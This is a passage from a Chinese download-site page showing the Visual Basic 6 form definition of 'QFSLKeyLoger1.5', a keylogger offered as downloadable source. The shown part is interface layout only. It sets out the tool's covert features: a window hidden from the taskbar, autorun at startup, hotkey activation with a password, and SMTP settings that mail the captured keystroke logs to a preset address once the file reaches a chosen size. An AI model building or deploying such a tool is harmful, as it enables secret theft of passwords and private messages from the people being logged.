⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 formmain.frm

📁 捕获键盘操作的记录
💻 FRM
📖 第 1 页 / 共 2 页
字号:
VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "MSCOMCTL.OCX"
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Form1 
   BorderStyle     =   3  'Fixed Dialog
   Caption         =   "QFSLKeyLoger1.5  清风山林作品"
   ClientHeight    =   4275
   ClientLeft      =   45
   ClientTop       =   330
   ClientWidth     =   4500
   Icon            =   "Formmain.frx":0000
   LinkTopic       =   "Form1"
   MaxButton       =   0   'False
   MinButton       =   0   'False
   ScaleHeight     =   4275
   ScaleWidth      =   4500
   ShowInTaskbar   =   0   'False
   StartUpPosition =   2  '屏幕中心
   Begin VB.Frame Frame10 
      BorderStyle     =   0  'None
      Height          =   2655
      Left            =   0
      TabIndex        =   30
      Top             =   360
      Visible         =   0   'False
      Width           =   4335
      Begin VB.CommandButton Command5 
         Caption         =   "使用说明"
         Height          =   375
         Left            =   3000
         TabIndex        =   33
         Top             =   120
         Width           =   1215
      End
      Begin VB.Label lblDisclaimer 
         Caption         =   "声明: "
         ForeColor       =   &H000000C0&
         Height          =   555
         Left            =   120
         TabIndex        =   35
         Top             =   2040
         Width           =   4215
      End
      Begin VB.Label lblDescription 
         ForeColor       =   &H00000000&
         Height          =   1245
         Left            =   120
         TabIndex        =   34
         Top             =   720
         Width           =   4005
      End
      Begin VB.Label lblVersion 
         Caption         =   "版    本  1.5"
         Height          =   225
         Left            =   840
         TabIndex        =   32
         Top             =   360
         Width           =   1245
      End
      Begin VB.Label lblTitle 
         Caption         =   "本程序名  QFSLKeyLoger"
         ForeColor       =   &H00000000&
         Height          =   360
         Left            =   840
         TabIndex        =   31
         Top             =   120
         Width           =   2085
      End
      Begin VB.Image Image2 
         BorderStyle     =   1  'Fixed Single
         Height          =   615
         Left            =   120
         Picture         =   "Formmain.frx":08CA
         Stretch         =   -1  'True
         Top             =   120
         Width           =   615
      End
   End
   Begin VB.Frame Frame5 
      Caption         =   "邮箱配置"
      Height          =   2655
      Left            =   120
      TabIndex        =   6
      Top             =   360
      Visible         =   0   'False
      Width           =   4095
      Begin VB.TextBox Text5 
         Height          =   270
         Left            =   1320
         TabIndex        =   16
         Text            =   "清风键盘记录"
         Top             =   1200
         Width           =   2535
      End
      Begin VB.ComboBox Combo1 
         Height          =   300
         Left            =   1320
         TabIndex        =   15
         Text            =   "smtp.163.net"
         Top             =   240
         Width           =   2535
      End
      Begin VB.TextBox Text1 
         Height          =   270
         Left            =   1320
         TabIndex        =   14
         Text            =   "qfsl@163.net"
         Top             =   720
         Width           =   2535
      End
      Begin VB.Frame Frame6 
         Height          =   1095
         Left            =   120
         TabIndex        =   7
         Top             =   1440
         Width           =   3855
         Begin VB.CommandButton Command1 
            Caption         =   "测试"
            Enabled         =   0   'False
            Height          =   375
            Left            =   120
            TabIndex        =   11
            Top             =   600
            Width           =   975
         End
         Begin VB.CheckBox Check1 
            Caption         =   "SMTP验证"
            Height          =   255
            Left            =   120
            TabIndex        =   10
            Top             =   240
            Width           =   1095
         End
         Begin VB.TextBox Text2 
            BackColor       =   &H80000000&
            Enabled         =   0   'False
            Height          =   270
            Left            =   2160
            TabIndex        =   9
            Text            =   "qfsl"
            Top             =   240
            Width           =   1575
         End
         Begin VB.TextBox Text3 
            BackColor       =   &H80000000&
            Enabled         =   0   'False
            Height          =   270
            IMEMode         =   3  'DISABLE
            Left            =   2160
            PasswordChar    =   "*"
            TabIndex        =   8
            Text            =   "qfsl"
            Top             =   720
            Width           =   1575
         End
         Begin VB.Label Label1 
            AutoSize        =   -1  'True
            Caption         =   "用户名"
            Height          =   180
            Index           =   2
            Left            =   1440
            TabIndex        =   13
            Top             =   240
            Width           =   540
         End
         Begin VB.Label Label1 
            AutoSize        =   -1  'True
            Caption         =   "密  码"
            Height          =   180
            Index           =   3
            Left            =   1440
            TabIndex        =   12
            Top             =   720
            Width           =   540
         End
      End
      Begin VB.Label Label3 
         Caption         =   "邮件主题"
         Height          =   255
         Left            =   360
         TabIndex        =   19
         Top             =   1200
         Width           =   855
      End
      Begin VB.Label Label1 
         AutoSize        =   -1  'True
         Caption         =   "SMTP服务器"
         Height          =   180
         Index           =   4
         Left            =   240
         TabIndex        =   18
         Top             =   360
         Width           =   900
      End
      Begin VB.Label Label1 
         AutoSize        =   -1  'True
         Caption         =   "接收邮箱"
         Height          =   180
         Index           =   1
         Left            =   360
         TabIndex        =   17
         Top             =   720
         Width           =   720
      End
   End
   Begin VB.Frame Frame9 
      BorderStyle     =   0  'None
      Height          =   2655
      Left            =   120
      TabIndex        =   20
      Top             =   360
      Visible         =   0   'False
      Width           =   4215
      Begin VB.Frame Frame8 
         Caption         =   "发送文件"
         Height          =   615
         Left            =   0
         TabIndex        =   26
         Top             =   1440
         Width           =   4095
         Begin VB.CheckBox Check4 
            Caption         =   "当文件"
            Height          =   255
            Left            =   720
            TabIndex        =   28
            Top             =   240
            Width           =   855
         End
         Begin VB.TextBox Text6 
            BackColor       =   &H80000000&
            Enabled         =   0   'False
            Height          =   270
            Left            =   1680
            MaxLength       =   2
            TabIndex        =   27
            Text            =   "5"
            Top             =   240
            Width           =   495
         End
         Begin VB.Label Label5 
            Caption         =   "KB大小  时自动发送"
            Height          =   255
            Left            =   2280
            TabIndex        =   29
            Top             =   240
            Width           =   1695
         End
         Begin VB.Image Image1 
            Height          =   375
            Index           =   1
            Left            =   120
            Picture         =   "Formmain.frx":0D0C
            Stretch         =   -1  'True
            Top             =   240
            Width           =   495
         End
      End
      Begin VB.Frame Frame7 
         Caption         =   "文件存储"
         Height          =   1335
         Left            =   0
         TabIndex        =   21
         Top             =   0
         Width           =   4095
         Begin VB.CommandButton Command4 
            Caption         =   "删除文件"
            Height          =   375
            Left            =   3000
            Picture         =   "Formmain.frx":1016
            TabIndex        =   24
            Top             =   840
            UseMaskColor    =   -1  'True
            Width           =   975
         End
         Begin VB.CommandButton Command3 
            Caption         =   "..."
            Height          =   255
            Left            =   3480
            TabIndex        =   23
            Top             =   480
            Width           =   495
         End
         Begin VB.TextBox Text4 
            Height          =   270
            Left            =   120
            TabIndex        =   22
            Top             =   480
            Width           =   3255
         End
         Begin VB.Label Label2 
            Caption         =   "文件的位置"
            Height          =   255
            Left            =   120
            TabIndex        =   25
            Top             =   240
            Width           =   1335
         End
         Begin VB.Image Image1 
            Height          =   375
            Index           =   0
            Left            =   2400
            Picture         =   "Formmain.frx":1458
            Stretch         =   -1  'True
            Top             =   840
            Width           =   495
         End
      End
   End
   Begin VB.Frame Frame11 
      BorderStyle     =   0  'None
      Height          =   2655
      Left            =   120
      TabIndex        =   36
      Top             =   360
      Width           =   4095
      Begin VB.Frame Frame3 
         Height          =   735
         Left            =   0
         TabIndex        =   42
         Top             =   600
         Width           =   4095
         Begin VB.TextBox Text7 
            BackColor       =   &H80000000&
            Enabled         =   0   'False
            BeginProperty Font 
               Name            =   "宋体"
               Size            =   10.5
               Charset         =   134
               Weight          =   400
               Underline       =   0   'False
               Italic          =   0   'False
               Strikethrough   =   0   'False
            EndProperty
            Height          =   315
            Left            =   1320
            MaxLength       =   3
            TabIndex        =   43
            Text            =   "0"
            Top             =   240
            Width           =   615
         End
         Begin VB.CheckBox Check2 
            Caption         =   "自动运行"
            Height          =   255
            Left            =   240
            TabIndex        =   44
            Top             =   240
            Width           =   1575
         End
         Begin VB.Label Label1 
            AutoSize        =   -1  'True
            Caption         =   "分钟后停止"
            Height          =   180
            Index           =   0
            Left            =   2160
            TabIndex        =   45
            Top             =   360
            Width           =   900
         End
         Begin VB.Image Image1 
            Height          =   375
            Index           =   3
            Left            =   3360
            Picture         =   "Formmain.frx":189A
            Stretch         =   -1  'True
            Top             =   240
            Width           =   495
         End
      End
      Begin VB.Frame Frame2 
         Height          =   615
         Left            =   0
         TabIndex        =   40
         Top             =   0
         Width           =   4095
         Begin VB.CheckBox Check5 
            Caption         =   "开机自动运行"
            Height          =   255
            Left            =   240
            TabIndex        =   41
            Top             =   240
            Width           =   1455
         End
         Begin VB.Image Image1 
            Height          =   375
            Index           =   4
            Left            =   3360
            Picture         =   "Formmain.frx":1FDC
            Stretch         =   -1  'True
            Top             =   120
            Width           =   495
         End
      End
      Begin VB.Frame Frame4 
         Height          =   735
         Left            =   0
         TabIndex        =   37
         Top             =   1440
         Width           =   4095
         Begin VB.TextBox Text8 
            BackColor       =   &H80000000&
            Enabled         =   0   'False
            BeginProperty Font 
               Name            =   "宋体"
               Size            =   14.25
               Charset         =   134
               Weight          =   400
               Underline       =   0   'False
               Italic          =   0   'False
               Strikethrough   =   0   'False
            EndProperty
            Height          =   375
            Left            =   1800
            TabIndex        =   39
            Top             =   240
            Width           =   1575
         End
         Begin VB.CheckBox Check3 
            Caption         =   "热键激活需密码"
            Height          =   255
            Left            =   240
            TabIndex        =   38
            Top             =   240
            Width           =   1575
         End
         Begin VB.Image Image1 
            Height          =   375
            Index           =   2
            Left            =   3360
            Picture         =   "Formmain.frx":241E
            Stretch         =   -1  'True
            Top             =   240

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -